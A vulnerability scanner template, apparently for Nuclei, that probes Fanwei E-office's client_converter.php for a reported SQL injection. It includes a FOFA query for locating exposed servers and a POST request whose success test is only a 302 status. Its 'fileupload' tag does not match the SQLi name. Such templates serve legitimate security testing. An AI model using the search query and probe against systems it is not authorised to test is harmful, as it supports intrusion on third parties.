id: fanwei-e-office-client-converter-sqli

info:
  name: Fanwei E-office client_converter.php Sqli
  author: zp857
  severity: high
  reference: https://moresec.yuque.com/iixlqz/wnv3e6/hglxt5
  tags: fanwei-e-office,fileupload
  metadata:
    fofa-query: 'body="/general/login/index.php" || body="/general/login/view/css/login.css" || header="/general/login/index.php"'

requests:
  - raw:
      - |
        POST /client_converter.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        sid=eyJ1c2VyQWNjb3VudCI6IjEiLCJsYW5nIjoiMSIsImdvdG8iOiIxIiwiZnVuY0lEIjoiMSJ9

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 302
